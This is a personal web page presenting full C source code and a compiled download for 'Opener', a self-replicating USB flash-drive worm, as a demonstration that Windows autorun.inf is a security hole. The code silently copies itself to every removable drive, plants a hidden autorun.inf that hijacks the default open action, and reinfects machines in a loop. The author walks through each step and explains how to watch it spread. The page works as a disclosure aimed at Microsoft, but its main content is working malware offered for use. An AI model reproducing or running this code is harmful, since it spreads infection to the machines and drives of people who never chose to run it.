Opener: A USB Flash Drive Virus

For a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but it's also a security risk. Pretty-much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk.. and you can always rely on Microsoft to make the potential an actual.

Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove should it? Fair enough, here's some code:


#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"

HANDLE hmutex = NULL;

void closing()
{
	if (hmutex)
		ReleaseMutex(hmutex);
}

int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
	UNREFERENCED_PARAMETER(hPrevInstance);
	UNREFERENCED_PARAMETER(lpCmdLine);

	WCHAR myfile[1024];
	GetModuleFileName(NULL, myfile, 1024);
	if (myfile[1] != L':')
		return 1;
	WCHAR cmd[1024];
	wsprintf(cmd, L"explorer %c:\\", myfile[0]);
	STARTUPINFOW si;
	memset(&si, 0, sizeof(si));
	si.cb = sizeof(si);
	PROCESS_INFORMATION po;
	memset(&po, 0, sizeof(po));
	CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po);

	hmutex = CreateMutex(NULL, TRUE, L"Opener");
	if (hmutex == INVALID_HANDLE_VALUE)
		return 1;
	if (GetLastError() == ERROR_ALREADY_EXISTS) {
		CloseHandle(hmutex);
		return 1;
	}

	atexit(closing);

	HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hmyfile == NULL)
		return 1;
	DWORD szhigh = 0;
	DWORD szlow = GetFileSize(hmyfile, &szhigh);
	if (szhigh != 0) {
		CloseHandle(hmyfile);
		return 1;
	}
	void *myfilemem = malloc(szhigh * 65536 + szlow);
	DWORD nread;
	ReadFile(hmyfile, myfilemem, szlow, &nread, NULL);
	CloseHandle(hmyfile);

	while(1) {
		DWORD mask = GetLogicalDrives();
		for (int i = 0; i < 26; i++) 
			if (mask & (1 << i)) {
				WCHAR path[100];
				path[0] = L'A' + i;
				path[1] = L':';
				path[2] = L'\\';
				path[3] = 0;
				DWORD type = GetDriveType(path);
				if (type == DRIVE_REMOVABLE) {
					DWORD spc, bps, nfc, tnc;
					if (GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc)) {
						if (nfc < tnc) {
							wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
							if (GetFileAttributes(path) == INVALID_FILE_ATTRIBUTES) {
								HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
								if (h != INVALID_HANDLE_VALUE) {
									DWORD written;
									WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
									CloseHandle(h);
									wsprintf(path, L"%c:\\opener.exe", L'A' + i);
									h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
									if (h != INVALID_HANDLE_VALUE) {
										WriteFile(h, myfilemem, szlow, &written, NULL);
										CloseHandle(h);
									} else {
										wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
										DeleteFile(path);
									}
								}
							}
						}
					}
				}
			}
		Sleep(1000 * 60);
	}

	return 0;
}
download: opener.cpp and here's it compiled: opener.exe.

How does it work?

It's really quite simple:

  1. Open an explorer window for the drive we're running from.
  2. Make sure there is only one copy of opener.exe running.
  3. Scan the available drives for any that are removable.
  4. Check that there is some free space on the drive.
  5. Check that the drive doesn't already have an autorun.inf.
  6. Dump the following into autorun.inf:
    [autorun]
    shell\eject=Eject
    shell\eject\command=opener.exe
    shell=eject
    
    This creates a new shell command which I've just randomly named "Eject" and, importantly, makes it the default action.
  7. Write a copy of opener.exe to the drive.
  8. Mark both autorun.inf and opener.exe as hidden.
  9. Do any other removable drives we can find.
  10. Wait about a minute.
  11. Go back to step 3.

So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected. Remove the drive, and use Task Manager to kill opener.exe, and now plug the drive back in. If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change - it won't pop up now. You may have had this experience before.. it's kinda random when Windows will and wont pop up that box.

No matter, go to My Computer as you typically would and double click on the drive that has been found.. as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again.

And so the cycle continues.

Dear Microsoft, please fix, thanks.


QuantumG


<< back to my home page